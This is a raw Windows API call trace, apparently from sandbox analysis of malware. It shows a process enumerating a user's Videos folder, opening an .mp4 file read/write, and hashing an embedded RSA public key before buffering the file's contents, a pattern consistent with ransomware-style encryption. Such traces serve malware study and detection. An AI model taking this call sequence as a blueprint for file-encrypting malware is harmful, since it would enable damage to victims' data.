[0202.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.007] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\") returned="vtiS4AAZ_oK\\" [0202.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0202.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0202.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.008] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\") returned="z2E0zT\\" [0202.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e900c8 [0202.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.008] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0202.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e900c8 | out: hHeap=0x620000) returned 1 [0202.009] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0202.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.009] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0202.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.010] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0202.010] PathFindFileNameW (pszPath="") returned="" [0202.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.010] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41c50b10, ftCreationTime.dwHighDateTime=0x1d89c0d, ftLastAccessTime.dwLowDateTime=0x59db12e0, ftLastAccessTime.dwHighDateTime=0x1d89cb6, ftLastWriteTime.dwLowDateTime=0x59db12e0, ftLastWriteTime.dwHighDateTime=0x1d89cb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0202.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41c50b10, ftCreationTime.dwHighDateTime=0x1d89c0d, ftLastAccessTime.dwLowDateTime=0x59db12e0, ftLastAccessTime.dwHighDateTime=0x1d89cb6, ftLastWriteTime.dwLowDateTime=0x59db12e0, ftLastWriteTime.dwHighDateTime=0x1d89cb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x371f55f0, ftCreationTime.dwHighDateTime=0x1d8a4c6, ftLastAccessTime.dwLowDateTime=0x59a71f0, ftLastAccessTime.dwHighDateTime=0x1d8a736, ftLastWriteTime.dwLowDateTime=0x59a71f0, ftLastWriteTime.dwHighDateTime=0x1d8a736, nFileSizeHigh=0x0, nFileSizeLow=0xf38b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="38n2O1ISSPYQrTiC8.mp4", cAlternateFileName="38N2O1~1.MP4")) returned 1 [0202.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.017] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\38n2O1ISSPYQrTiC8.mp4") returned=".mp4" [0202.017] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\38n2O1ISSPYQrTiC8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\38n2o1isspyqrtic8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.018] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=62347) returned 1 [0202.018] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.021] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf365, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.021] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.023] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.023] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf38b, lpOverlapped=0x0) returned 1 [0202.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.024] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.025] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.025] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.025] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.025] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.025] GetLastError () returned 0x0 [0202.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.025] GetLastError () returned 0x0 [0202.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.026] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.026] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.026] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.026] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.026] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf390) returned 0x2ea99b0 [0202.027] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e900c8 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90110 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.028] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3590 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.031] GetCurrentThreadId () returned 0x66c [0202.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8e98 [0202.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.033] GetCurrentThreadId () returned 0x66c [0202.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0202.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0202.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 